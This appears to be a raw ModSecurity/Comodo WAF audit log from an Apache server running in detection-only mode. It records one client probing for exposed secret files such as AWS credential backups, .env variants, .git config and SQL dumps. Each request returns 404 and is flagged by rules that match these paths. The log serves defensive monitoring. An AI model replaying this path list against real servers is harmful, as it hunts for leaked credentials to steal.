--db3dcf41-B-- GET /aws/s3/credentials.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --db3dcf41-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --db3dcf41-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/aws/s3/credentials.bak"] [unique_id "aFCr8ArsPejRtmHkrKLgcwAAAAE"] Stopwatch: 1750117360031014 3710 (- - -) Stopwatch2: 1750117360031014 3710; combined=2265, p1=408, p2=1730, p3=24, p4=32, p5=71, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --db3dcf41-Z-- --628a631c-A-- [17/Jun/2025:05:12:43.234907 +0530] aFCr85WbMc1Q3J_M-mhIlgAAAAo 185.177.72.204 33058 127.0.0.1 7080 --628a631c-B-- GET /awstats/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --628a631c-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --628a631c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/awstats/.env"] [unique_id "aFCr85WbMc1Q3J_M-mhIlgAAAAo"] Stopwatch: 1750117363231755 3196 (- - -) Stopwatch2: 1750117363231755 3196; combined=1959, p1=378, p2=1468, p3=20, p4=26, p5=67, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --628a631c-Z-- --e094313a-A-- [17/Jun/2025:05:12:43.458010 +0530] aFCr84oVQnPDyHnl9oPTlgAAAAY 185.177.72.204 33074 127.0.0.1 7080 --e094313a-B-- GET /backend/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e094313a-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --e094313a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/backend/.env"] [unique_id "aFCr84oVQnPDyHnl9oPTlgAAAAY"] Stopwatch: 1750117363453347 4713 (- - -) Stopwatch2: 1750117363453347 4713; combined=3482, p1=392, p2=2973, p3=26, p4=32, p5=59, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e094313a-Z-- --8cb69c51-A-- [17/Jun/2025:05:12:43.900861 +0530] aFCr84oVQnPDyHnl9oPTlwAAAAY 185.177.72.204 33122 127.0.0.1 7080 --8cb69c51-B-- GET /backup.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --8cb69c51-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --8cb69c51-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/backup.bak"] [unique_id "aFCr84oVQnPDyHnl9oPTlwAAAAY"] Stopwatch: 1750117363897801 3105 (- - -) Stopwatch2: 1750117363897801 3105; combined=1943, p1=362, p2=1483, p3=19, p4=24, p5=55, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8cb69c51-Z-- --50b85d69-A-- [17/Jun/2025:05:12:44.011690 +0530] aFCr9JVkCcfT-Z8NQYzE5gAAAAc 185.177.72.204 33134 127.0.0.1 7080 --50b85d69-B-- GET /backup.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --50b85d69-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --50b85d69-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/backup.sql"] [unique_id "aFCr9JVkCcfT-Z8NQYzE5gAAAAc"] Stopwatch: 1750117364008271 3464 (- - -) Stopwatch2: 1750117364008271 3464; combined=2133, p1=350, p2=1664, p3=21, p4=28, p5=70, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --50b85d69-Z-- --2be0ff66-A-- [17/Jun/2025:05:12:44.453567 +0530] aFCr9FCTF37l_jAzt4oS5wAAAAU 185.177.72.204 33168 127.0.0.1 7080 --2be0ff66-B-- GET /backup/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --2be0ff66-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --2be0ff66-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/backup/.env"] [unique_id "aFCr9FCTF37l_jAzt4oS5wAAAAU"] Stopwatch: 1750117364450436 3179 (- - -) Stopwatch2: 1750117364450436 3179; combined=1901, p1=395, p2=1396, p3=18, p4=25, p5=67, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2be0ff66-Z-- --f299c232-A-- [17/Jun/2025:05:12:44.564355 +0530] aFCr9NyZ4SMykfn97vy3bQAAAAs 185.177.72.204 33184 127.0.0.1 7080 --f299c232-B-- GET /backup/.env.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f299c232-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --f299c232-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/backup/.env.bak"] [unique_id "aFCr9NyZ4SMykfn97vy3bQAAAAs"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/backup/.env.bak"] [unique_id "aFCr9NyZ4SMykfn97vy3bQAAAAs"] Stopwatch: 1750117364560897 3502 (- - -) Stopwatch2: 1750117364560897 3502; combined=2070, p1=425, p2=1505, p3=21, p4=26, p5=93, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f299c232-Z-- --f351a17d-A-- [17/Jun/2025:05:12:44.674952 +0530] aFCr9IoVQnPDyHnl9oPTmAAAAAY 185.177.72.204 33198 127.0.0.1 7080 --f351a17d-B-- GET /backup/.env.local HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f351a17d-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --f351a17d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/backup/.env.local"] [unique_id "aFCr9IoVQnPDyHnl9oPTmAAAAAY"] Stopwatch: 1750117364671412 3584 (- - -) Stopwatch2: 1750117364671412 3584; combined=2164, p1=448, p2=1591, p3=24, p4=30, p5=71, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f351a17d-Z-- --6655fa0f-A-- [17/Jun/2025:05:12:44.785003 +0530] aFCr9FJfblPUQiSn5r2RjQAAAAA 185.177.72.204 33208 127.0.0.1 7080 --6655fa0f-B-- GET /backup/.env.old HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6655fa0f-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --6655fa0f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/backup/.env.old"] [unique_id "aFCr9FJfblPUQiSn5r2RjQAAAAA"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/backup/.env.old"] [unique_id "aFCr9FJfblPUQiSn5r2RjQAAAAA"] Stopwatch: 1750117364782152 2894 (- - -) Stopwatch2: 1750117364782152 2894; combined=1739, p1=362, p2=1268, p3=17, p4=23, p5=69, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6655fa0f-Z-- --98ce6151-A-- [17/Jun/2025:05:12:44.895010 +0530] aFCr9JWbMc1Q3J_M-mhImQAAAAo 185.177.72.204 33212 127.0.0.1 7080 --98ce6151-B-- GET /backup/.env.save HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --98ce6151-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --98ce6151-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/backup/.env.save"] [unique_id "aFCr9JWbMc1Q3J_M-mhImQAAAAo"] Stopwatch: 1750117364892143 2910 (- - -) Stopwatch2: 1750117364892143 2910; combined=1721, p1=381, p2=1245, p3=17, p4=25, p5=53, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --98ce6151-Z-- --04d84834-A-- [17/Jun/2025:05:12:45.006392 +0530] aFCr9VCTF37l_jAzt4oS6AAAAAU 185.177.72.204 33218 127.0.0.1 7080 --04d84834-B-- GET /backup/.env~ HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --04d84834-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --04d84834-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/backup/.env~"] [unique_id "aFCr9VCTF37l_jAzt4oS6AAAAAU"] Stopwatch: 1750117365002248 4204 (- - -) Stopwatch2: 1750117365002248 4204; combined=2696, p1=481, p2=2064, p3=31, p4=36, p5=84, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --04d84834-Z-- --26396472-A-- [17/Jun/2025:05:12:45.117794 +0530] aFCr9YoVQnPDyHnl9oPTmQAAAAY 185.177.72.204 33228 127.0.0.1 7080 --26396472-B-- GET /backup/.git/ HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --26396472-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --26396472-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/backup/.git/"] [unique_id "aFCr9YoVQnPDyHnl9oPTmQAAAAY"] Stopwatch: 1750117365113585 4269 (- - -) Stopwatch2: 1750117365113585 4269; combined=2655, p1=554, p2=1934, p3=35, p4=60, p5=72, sr=138, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --26396472-Z-- --48bc4a70-A-- [17/Jun/2025:05:12:45.228117 +0530] aFCr9ZVkCcfT-Z8NQYzE6AAAAAc 185.177.72.204 33230 127.0.0.1 7080 --48bc4a70-B-- GET /backup/.git/HEAD HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --48bc4a70-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --48bc4a70-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/backup/.git/HEAD"] [unique_id "aFCr9ZVkCcfT-Z8NQYzE6AAAAAc"] Stopwatch: 1750117365225130 3068 (- - -) Stopwatch2: 1750117365225130 3068; combined=1887, p1=369, p2=1419, p3=23, p4=23, p5=53, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --48bc4a70-Z-- --be518274-A-- [17/Jun/2025:05:12:45.339046 +0530] aFCr9VJfblPUQiSn5r2RjgAAAAA 185.177.72.204 33246 127.0.0.1 7080 --be518274-B-- GET /backup/.git/config HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --be518274-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --be518274-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/backup/.git/config"] [unique_id "aFCr9VJfblPUQiSn5r2RjgAAAAA"] Stopwatch: 1750117365335436 3669 (- - -) Stopwatch2: 1750117365335436 3669; combined=2249, p1=481, p2=1633, p3=33, p4=32, p5=69, sr=112, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --be518274-Z-- --91698f3c-A-- [17/Jun/2025:05:12:45.449238 +0530] aFCr9eTJOk1gXj_qIh4X2gAAAAQ 185.177.72.204 33258 127.0.0.1 7080 --91698f3c-B-- GET /backup/.git/logs/HEAD HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --91698f3c-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --91698f3c-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/backup/.git/logs/HEAD"] [unique_id "aFCr9eTJOk1gXj_qIh4X2gAAAAQ"] Stopwatch: 1750117365446223 3059 (- - -) Stopwatch2: 1750117365446223 3059; combined=1919, p1=377, p2=1446, p3=21, p4=23, p5=51, sr=90, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --91698f3c-Z-- --7cd9991f-A-- [17/Jun/2025:05:12:45.559521 +0530] aFCr9ZWbMc1Q3J_M-mhImgAAAAo 185.177.72.204 33264 127.0.0.1 7080 --7cd9991f-B-- GET /backup/.gitignore HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --7cd9991f-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --7cd9991f-H-- Message: Warning. Matched phrase "/.gitignore" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/backup/.gitignore"] [unique_id "aFCr9ZWbMc1Q3J_M-mhImgAAAAo"] Stopwatch: 1750117365556384 3182 (- - -) Stopwatch2: 1750117365556384 3182; combined=1956, p1=401, p2=1451, p3=22, p4=26, p5=56, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7cd9991f-Z-- --a5334c31-A-- [17/Jun/2025:05:12:45.670205 +0530] aFCr9QJ4p5Cdblnjra533wAAAAI 185.177.72.204 33270 127.0.0.1 7080 --a5334c31-B-- GET /backup/access.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a5334c31-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5334c31-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname 